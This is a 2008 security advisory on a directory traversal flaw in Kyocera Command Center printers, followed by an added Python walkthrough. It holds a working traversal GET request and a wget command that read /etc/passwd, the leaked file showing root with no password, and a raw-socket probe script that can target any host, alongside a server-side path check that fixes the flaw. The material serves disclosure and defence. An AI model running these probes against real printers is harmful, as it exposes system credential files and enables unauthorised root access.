
kyocera-traversal.txt

🗓️ 27 Aug 2008 · Reported by Francesco Tornieri · Type: packetstorm · Source: packetstormsecurity.com

Kyocera Command Center Directory Traversal Vulnerability. Tested on: FS-118MFP printer (embedded Linux); other Kyocera models may also be affected. Risk: Critical. Insufficient validation of the requested path lets an unauthenticated attacker read files outside the web root (the advisory retrieves /etc/passwd, which shows the root account with an empty password field).

Code
`Kyocera Command Center Directory Traversal Vulnerability  
  
Version: I've tested this vulnerability against the Kyocera Command Center embedded in the FS-118MFP (embedded Linux) printer, but I suppose that other Kyocera printers may be vulnerable  
  
Vulnerability: Directory Traversal  
  
Risk: Critical  
  
Description (Wikipedia, http://en.wikipedia.org/wiki/Directory_traversal): "A directory traversal (or path traversal) is to exploit insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.  
The goal of this attack is to order an application to access a computer file that is not intended to be accessible. This attack exploits a lack of security (the software is acting exactly as it is supposed to) as opposed to exploiting a bug in the code.  
Directory traversal is also known as the ../ (dot dot slash) attack, directory climbing, and backtracking. Some forms of this attack are also canonicalization attacks"   
  
Example GET Request:  
  
GET /../../../../../../../../../etc/passwd HTTP/1.0  
  
Example file download:  
  
wget http://yourip/../../../../../../../../../etc/passwd  
cat passwd  
root::0:0:root:/root:/bin/sh  
bin:*:1:1:bin:/bin:  
daemon:*:2:2:daemon:/usr/sbin:  
sys:*:3:3:sys:/dev:  
adm:*:4:4:adm:/var/adm:  
lp:*:5:7:lp:/var/spool/lpd:  
sync:*:6:8:sync:/bin:/bin/sync  
shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown  
halt:*:8:10:halt:/sbin:/sbin/halt  
mail:*:9:11:mail:/var/spool/mail:  
news:*:10:12:news:/var/spool/news:  
uucp:*:11:13:uucp:/var/spool/uucp:  
operator:*:12:0:operator:/root:  
games:*:13:100:games:/usr/games:  
ftp:*:15:14:ftp:/var/ftp:  
man:*:16:100:man:/var/cache/man:  
nobody:*:65534:65534:nobody:/home:/bin/sh  
  
Francesco Tornieri  
`
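The following Python is an added example, not code from the advisory, from Kyocera or from Packet Storm. It shows both sides of the traversal the advisory describes: a probe that sends the advisory's `GET /../../../../../../../../../etc/passwd HTTP/1.0` request line verbatim (written by hand on a raw socket, because most HTTP clients collapse `../` segments before sending), a parser that confirms the response really is a passwd(5) file and flags accounts with an empty password field (the advisory's dump lists `root::0:0:...`, i.e. root with no password), and the server-side check the Command Center was missing: decode, canonicalise, then refuse any path that resolves outside the web root. The host name `printer.example`, the web root `/srv/www` and the embedded passwd fixture (copied from the advisory's output) are assumptions for illustration; nothing here contacts a live device unless you call `send_raw` yourself.

```python
import os
import socket
from typing import Optional
from urllib.parse import unquote

# Request path copied verbatim from the advisory's example GET request.
TRAVERSAL_PATH = "/../../../../../../../../../etc/passwd"

# Constructed fixture: the passwd content the advisory shows wget retrieving.
SAMPLE_PASSWD = """root::0:0:root:/root:/bin/sh
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
adm:*:4:4:adm:/var/adm:
lp:*:5:7:lp:/var/spool/lpd:
sync:*:6:8:sync:/bin:/bin/sync
shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown
halt:*:8:10:halt:/sbin:/sbin/halt
mail:*:9:11:mail:/var/spool/mail:
news:*:10:12:news:/var/spool/news:
uucp:*:11:13:uucp:/var/spool/uucp:
operator:*:12:0:operator:/root:
games:*:13:100:games:/usr/games:
ftp:*:15:14:ftp:/var/ftp:
man:*:16:100:man:/var/cache/man:
nobody:*:65534:65534:nobody:/home:/bin/sh
"""


def build_traversal_request(host: str, path: str = TRAVERSAL_PATH) -> bytes:
    """Raw HTTP/1.0 request line. Built by hand so no client library
    normalises the '../' segments away before they reach the printer."""
    return f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")


def send_raw(host: str, port: int = 80, path: str = TRAVERSAL_PATH,
             timeout: float = 5.0) -> bytes:
    """Send the probe over a plain socket and return the full raw response."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_traversal_request(host, path))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def http_body(raw: bytes) -> bytes:
    """Strip the status line and headers; return the body (or all of it if
    the server sent no header block)."""
    _head, sep, body = raw.partition(b"\r\n\r\n")
    return body if sep else raw


def parse_passwd(text: str) -> list[dict]:
    """Parse passwd(5) lines: exactly 7 colon-separated fields with numeric
    uid/gid. Anything else (an HTML error page, a banner) is dropped, so a
    non-empty result is good evidence the traversal actually worked."""
    entries = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not (fields[2].isdigit() and fields[3].isdigit()):
            continue
        name, passwd, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "passwd": passwd, "uid": int(uid),
                        "gid": int(gid), "gecos": gecos, "home": home,
                        "shell": shell})
    return entries


def passwordless_accounts(entries: list[dict]) -> list[str]:
    """Accounts whose password field is empty: loginable with no password
    if the device has no shadow file."""
    return [e["name"] for e in entries if e["passwd"] == ""]


def safe_resolve(web_root: str, url_path: str) -> Optional[str]:
    """The check the vulnerable server lacked: percent-decode, reject NULs,
    canonicalise with realpath, then require the result to stay under
    web_root. Returns the filesystem path or None if it escapes."""
    decoded = unquote(url_path)
    if "\x00" in decoded:
        return None
    root = os.path.realpath(web_root)
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    # Offline walk-through against the fixture; pass a host to probe for real.
    import sys
    body = send_raw(sys.argv[1]).decode("latin-1") if len(sys.argv) > 1 \
        else SAMPLE_PASSWD
    users = parse_passwd(http_body(body.encode("latin-1")).decode("latin-1"))
    print(f"{len(users)} passwd entries; passwordless: {passwordless_accounts(users)}")
    for p in (TRAVERSAL_PATH, "/%2e%2e/%2e%2e/etc/passwd", "/index.html"):
        print(f"{p!r:45} -> {safe_resolve('/srv/www', p)}")
```

`safe_resolve` decodes before canonicalising so `%2e%2e` is caught as well as literal `..`, and it compares with `commonpath` rather than a string prefix so `/srv/www-old/...` is not mistaken for a child of `/srv/www`. On the offensive side, `curl --path-as-is` is the command-line equivalent of the hand-built request line.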
